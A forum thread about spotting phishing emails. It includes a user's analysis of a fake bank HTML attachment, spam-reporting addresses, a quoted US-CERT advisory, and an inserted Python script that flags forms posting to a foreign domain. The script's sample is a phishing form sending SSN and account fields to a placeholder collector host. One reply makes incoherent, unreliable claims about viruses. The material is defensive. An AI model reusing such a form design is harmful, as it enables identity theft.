5 Votes
HTML attachment clue
blaineclrk Updated - 13th Dec 2011
I recently got an email from a bank asking for information regarding some out of normal activity. The email included an HTML file which contained a form. I saved it, then opened it with an editor. I was slightly surprised at the excellent language and vocabulary used, then, looking at the head tags I saw they were using script and CSS files from the bank site to make their message look and feel real (if I had been foolish enough to have opened it in a browser). Throughout the body of the email were image links from the bank website but the address for the form submission, the ONLY address in the attachment that wasn't from the bank's site, was to a different source for processing the form. Another set of giveaways were they needed my SS# and other bank info of course. Oh, the big giveaway was; I have never done business with this banking company! But, if they had used my bank I would still have checked the attachment VERY carefully just as I've described. A real notice from a bank should be a phone call, not asking for info over the phone either, but asking me to see them personally.
Be very careful folks, wolves in sheep's skins are getting smarter and more dangerous.
Here are several sources for reporting SPAM to. Some are legal authorities, some are just analysts.
reportphishing@antiphishing.org: database to collect and analyze SPAM
webcomplaints@ora.fda.gov: snake-oil and other so-called health medications.
fraud@usps.gov: anything to do with mail orders or anything else referencing using the postal service.
customer@email.usps.gov: chain mails having to do with money.
spam@uce.gov: general, or all SPAM.
enforcement@sec.gov: for stock scams and money laundering.
Check out spamcop.net as well and remember to find and run their authentication routines on each of your email accounts if you register. Spamcop is not a legal enforcement agency. Their service notifies the (usually) innocent hosts that they have been hacked and used to send SPAM so that they can take action on their end to plug the holes and block the accounts that have been compromised or fraudulently created.
As for you identifying SPAM, only your smarts can do that 100%.
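The check described in the post above (look-and-feel resources loaded from the bank's site, form submission sent somewhere else) can be automated for triage. This is an added example, not part of the original post; the domains `bank.example` and `collector.example`, the sample HTML and all function names are constructed for illustration.

```python
from collections import Counter
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample; bank.example and collector.example are placeholder domains.
SAMPLE_ATTACHMENT = """<html><head>
<link rel="stylesheet" href="https://www.bank.example/css/site.css">
<script src="https://www.bank.example/js/forms.js"></script>
</head><body>
<img src="https://images.bank.example/logo.gif">
<form method="post" action="http://collector.example/process.php">
<input name="ssn"><input name="account_number"><input type="submit">
</form>
<img src="https://www.bank.example/img/footer.gif" />
</body></html>"""

URL_ATTR = {"script": "src", "link": "href", "img": "src"}  # look-and-feel resources

def site_of(url):
    """Naive registrable domain (last two labels); real code should use the Public Suffix List."""
    host = (urlsplit((url or "").strip()).hostname or "").lower()
    return ".".join(host.split(".")[-2:]) if host else ""

class AttachmentScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.resource_sites = Counter()   # where scripts, CSS and images are loaded from
        self.forms = []                   # one dict per <form>: action URL and field names

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.forms.append({"action": attrs.get("action") or "", "fields": []})
        elif tag == "input" and self.forms and attrs.get("name"):
            self.forms[-1]["fields"].append(attrs["name"])
        elif tag in URL_ATTR and site_of(attrs.get(URL_ATTR[tag])):
            self.resource_sites[site_of(attrs.get(URL_ATTR[tag]))] += 1

def audit_attachment(html):
    """Return (dominant resource site, forms whose action posts to a different site)."""
    scanner = AttachmentScanner()
    scanner.feed(html)
    brand = scanner.resource_sites.most_common(1)[0][0] if scanner.resource_sites else ""
    # Relative or empty actions have no host and are skipped.
    mismatched = [f for f in scanner.forms
                  if site_of(f["action"]) and site_of(f["action"]) != brand]
    return brand, mismatched

if __name__ == "__main__":
    brand, mismatched = audit_attachment(SAMPLE_ATTACHMENT)
    for form in mismatched:
        print(f"resources from {brand}, but form posts {form['fields']} to {form['action']}")
```

An empty result only means the form target matches the borrowed resources; it does not make an unsolicited HTML attachment trustworthy.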
Many thanks for this resource list.
I, too, recently got an email from a bank that I do do business with asking for information. No bank account number or SSN number. The bank wanted to know whether two "suspicious" charges that appeared on my credit/debit card were legit. I suppose that's because I live in Taiwan and my bank is in California -- they do have both my California and Taiwan addresses, though. One of the charges was for US$150 and the other for US$10. I clicked "Authorize", and that's all there was to it. Come to think of it now, however, I don't remember how it was that the pop-up window asking me about those charges arrived. I may have been on my online banking site, but maybe I wasn't, and I don't use any IM apps except for Skype, but my bank doesn't have that address. Now I'm a little perplexed. Thank you for stimulating my brain in this case. I'll be more careful next time.

I often get emails from banks I don't do business with, both in the US and in Taiwan. I just delete them, just as I do with all the social networking emails allegedly from services I do not use: Twitter, Facebook, LinkedIn, and more I've never heard of before. I just delete them.
-4 Votes
I really see that all computers are deliberately kept under a certain clock speed to give virus more power. Right now I can't imagine what in my computer is 3 gig. I want that 3 gig right where that little arrow is. Fraud mail is virus sliding. These psychos are even sliding their virus into trees and buildings.
0 Votes
I could brag and say that since I use Linux/Ubuntu I don't have to be concerned about viruses, but even though I don't have to worry about viruses, I still have to keep tabs on my behavior and actions on-line. If I click on that wrong link I could get bombarded with spam. If one of my Yahoo or Google or ISP-sourced email friends gets hacked and my email address hits the web-waves, I could get loads of spam. If I'm not constantly observant and enter just that one little bit of private info on some untrusted or insecure login or some other form, I could get worse than spam, I could open the door for ID theft. Here's a recent addition regarding handling ID theft; http://www.idtheft.gov/

As far as computer speed goes, viruses would love to be able to use every bit of your computer's resources, and they can! The faster and newer your computer is, the better YOUR programs and THEIR viruses can operate. When your system gets overloaded and bogged down, that's when you know something's wrong. Either your Operating System is breaking, your hardware is breaking, or you're under the power of viruses that are stealing your power and probably worse than just your computer's power, they could be stealing YOUR power!

Although I can boast that I don't have to be concerned about viruses on my operating system and I don't have one single anti-virus program running, I still can't afford to let my anti-stupidity lapse! That's one subscription that can't be trusted to anyone else but ME!
0 Votes
Just one example of the many attacks in action;

Original release date: December 20, 2011 at 11:00 am
Last revised: December 20, 2011 at 11:00 am

US-CERT is aware of public reports of an active spear-phishing attack via email messages directed at United Services Automobile Association (USAA) members. These messages contain the subject line "Direct Posted" and contain a randomly generated four-digit number placed in the USAA security zone section. The messages ask users to open an attached file containing malicious software that if activated could provide access to a user's personal information.

US-CERT encourages users to do the following to help mitigate the risk:
* Review the alert posted by USAA regarding this issue.
* Do not open attachments in email messages from unknown sources.
* Refer to the Recognizing and Avoiding Email Scams (pdf) document for more information on avoiding email scams.
* Refer to the Avoiding Social Engineering and Phishing Attacks document for more information on social engineering attacks.
* Install anti-virus software and keep virus signature files up to date.

Relevant Url(s):
http://www.us-cert.gov/cas/tips/ST04-014.html

http://www.us-cert.gov/reading_room/emailscams_0905.pdf

https://www.usaa.com/inet/pages/2011_19_12_deposit_phish_scam

This entry is available at
http://www.us-cert.gov/current/index.html#usaa_phishing_scam_and_malware